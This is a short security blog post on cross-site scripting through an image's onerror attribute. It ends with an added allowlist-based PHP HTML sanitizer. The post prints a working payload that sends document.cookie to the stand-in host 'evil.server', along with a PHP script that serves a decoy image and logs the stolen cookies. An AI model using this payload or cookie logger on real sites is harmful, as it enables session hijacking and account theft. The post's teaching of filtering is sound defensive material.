Aaron Saray


XSS with Img OnError attribute

So much of my time is spent worrying about the src and href attributes of images and links that I sometimes forget about the other attributes.

Imagine an image whose src contains nothing that would be flagged, yet which still makes a remote request that leaks the user's cookies. That's right, this can be done using the 'onerror' attribute of an image.

What you need to do is create an image whose src is obviously broken or empty. When the image fails to load, the browser fires that element's error event, and whatever JavaScript sits in the onerror attribute runs. Put code in onerror that sets the image's src to a remote URL with document.cookie appended. The remote script logs every request it receives and then serves an image, so nothing looks wrong on the page.

Check out the code below:

Source page without proper filtering:

<html>
<body>
<h1>test</h1>
<h2>asdf</h2>
<!-- the empty src never loads, so the onerror handler runs and sends document.cookie to the remote server -->
<img src="" onerror="this.src='http://evil.server/exploit.php?'+document.cookie" />
</body>
</html>

Then, on evil.server, place your image. Finally, top it off with the following code in exploit.php

<?php
// Image to serve back so the request looks like a normal image load.
$image_path = 'test.jpg';
header('Accept-Ranges: bytes');
header('Content-Length: ' . filesize($image_path));
header('Keep-Alive: timeout=15, max=2469');
echo file_get_contents($image_path);
// The query string of the request carries the cookie value; write it to a log file.
file_put_contents("cookieLog.txt", $_SERVER['REQUEST_URI']);
?>

Easy as that. Just another reminder to properly filter your user-submitted content, and to filter every attribute, not just src and href.
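To show what "properly filter" means in practice, here is an added example that is not part of the original post: an allowlist-based HTML filter in PHP that keeps only known-safe tags and attributes, so an onerror (or any other on*) attribute is dropped no matter what its src looks like. The function and constant names are my own; it relies only on PHP's bundled DOM extension.

```php
<?php
// Added example, not code from the original post: an allowlist filter for user-
// submitted HTML on PHP's bundled DOM extension. Only listed tags/attributes survive
// (so onerror/onload/onclick never do); href/src with a non-http(s) scheme are dropped.
const ALLOWED_TAGS = ['p' => [], 'b' => [], 'i' => [], 'em' => [], 'strong' => [],
    'h2' => [], 'a' => ['href', 'title'], 'img' => ['src', 'alt']];
const URL_ATTRS = ['href', 'src'];
function safe_url(string $url): bool
{
    // Browsers skip ASCII control/whitespace inside a scheme, so strip them first (entities are already decoded by the DOM parser).
    $scheme = parse_url(preg_replace('/[\x00-\x20]+/', '', $url), PHP_URL_SCHEME);
    return $scheme === null   // relative URL: no scheme at all
        || (is_string($scheme) && in_array(strtolower($scheme), ['http', 'https'], true));
}
function clean_node(DOMNode $node): void
{
    // Iterate over a copy: removing children mutates the live DOMNodeList.
    foreach (iterator_to_array($node->childNodes, false) as $child) {
        if (!$child instanceof DOMElement) {
            if (!$child instanceof DOMText) $node->removeChild($child); // comments, PIs
            continue;
        }
        $tag = strtolower($child->tagName);
        if (!isset(ALLOWED_TAGS[$tag])) {   // script, iframe, div, ...: drop with content
            $node->removeChild($child);
            continue;
        }
        foreach (iterator_to_array($child->attributes, false) as $attr) {
            $name = strtolower($attr->name);
            if (!in_array($name, ALLOWED_TAGS[$tag], true)
                || (in_array($name, URL_ATTRS, true) && !safe_url($attr->value))) {
                $child->removeAttribute($attr->name);
            }
        }
        clean_node($child);
    }
}
function sanitize_html(string $fragment): string
{
    $doc = new DOMDocument(); libxml_use_internal_errors(true); // tolerate sloppy markup
    $doc->loadHTML('<div>' . $fragment . '</div>');  // the wrapper div is our root
    $wrapper = $doc->getElementsByTagName('div')->item(0);
    clean_node($wrapper);
    $out = '';
    foreach ($wrapper->childNodes as $child) $out .= $doc->saveHTML($child);
    return $out;
}
// Constructed sample: the post's onerror payload plus a javascript: link.
echo sanitize_html('<h2>asdf</h2><img src="" onerror="this.src=\'http://evil.server/exploit.php?\'+document.cookie" />'
    . '<a href="javascript:alert(1)" title="x">click</a>'), "\n";
```

The img keeps only its src and the link keeps only its title; unknown elements such as script or style are removed together with their content, which is the conservative choice for a comment form.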
